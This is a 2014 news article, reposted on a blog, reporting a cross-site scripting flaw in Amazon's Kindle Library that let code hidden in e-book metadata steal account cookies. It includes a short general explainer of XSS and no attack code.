Is YOUR Amazon account at risk? Security expert finds flaw in the Kindle library that could expose personal details

Home »Is YOUR Amazon account at risk? Security expert finds flaw in the Kindle library that could expose personal details

Is YOUR Amazon account at risk? Security expert finds flaw in the Kindle library that could expose personal details

Posted by sciencetech-blog on Tuesday, September 16, 2014 Label:

comments

Next time you log into Amazon to manage your Kindle and e-books, you could be putting your personal details at risk.

A German security researcher has spotted a vulnerability in the retail giant's website that hackers could exploit to gain full access to users' accounts.

The flaw, which can be exploited when a user downloads a malicious e-book, has been active since at least July this year, despite being reported to Amazon's security team.

Scroll down for video

The Kindle flaw was originally discovered by German security expert Benjamin Mussler in October last year and fixed in December. However, when Amazon redesigned its Manage Your Kindle page, earlier this year, the flaw was reintroduced. The vulnerability is exposed if a user downloads a malicious e-book

It was originally discovered by German security expert Benjamin Mussler in October, and was subsequently fixed in December.

More...

Everyone who uses Amazon's Kindle Library to store e-books or to deliver them to a Kindle, is potentially at risk, said Mr Mussler.

WHAT IS CROSS SITE SCRIPTING?

Cross Site Scripting is also known as XSS and is one of the most common web application vulnerabilities.

It lets hackers add and run their own scripts into web pages viewed by other users.

In a typical attack, a hacker 'inject' malicious code into a legitimate website.

When a user visits the site, through a malicious link, the code is 'executed', which means it carries out whatever task the hacker has set it.

This can be used to steal login details, access accounts or added viruses to devices.

However, he stressed that the users most likely to fall victim to this vulnerability are those who obtain e-books from untrustworthy sources, such as pirate e-book sellers.

However, when Amazon redesigned its Manage Your Kindle page, earlier this year, the flaw was reintroduced.

'Amazon's Kindle Library, also known as Manage Your Content and Devices, and Manage your Kindle, is, at the time of writing, vulnerable to Cross-Site Scripting (XSS) attacks,' explained Mr Mussler.

'Malicious code can be injected via e-book metadata.'

Mr Mussler continued that once an attacker manages to add a malicious e-book to a victim's library, the code is executed as soon as the victim opens the Kindle Library web page.

'As a result, Amazon account cookies can be accessed by, and transferred to, the attacker and the victim's Amazon account can be compromised,' added Mr Mussler.

The attack is known as Cross-Site Scripting, or XSS. Once an attacker manages to add the malicious e-book to a victim's library, the code is executed as soon when they open the Kindle Library web page. Amazon account cookies can then be accessed by the attacker and the victim's Amazon account can be compromised

This could potentially expose personal addresses, payment details and order history.

Everyone who uses Amazon's Kindle Library to store e-books or to deliver them to a Kindle, is at risk, said Mr Mussler.

'From the supplier's point of view, vulnerabilities like this present an opportunity to gain access to active Amazon accounts,' said Mr Mussler.

'Users who stick to e-books sold and delivered by Amazon should be safe.'

Amazon has not yet responded to MailOnline's request for comment.

5 tips for staying secure and safe on the internet (related)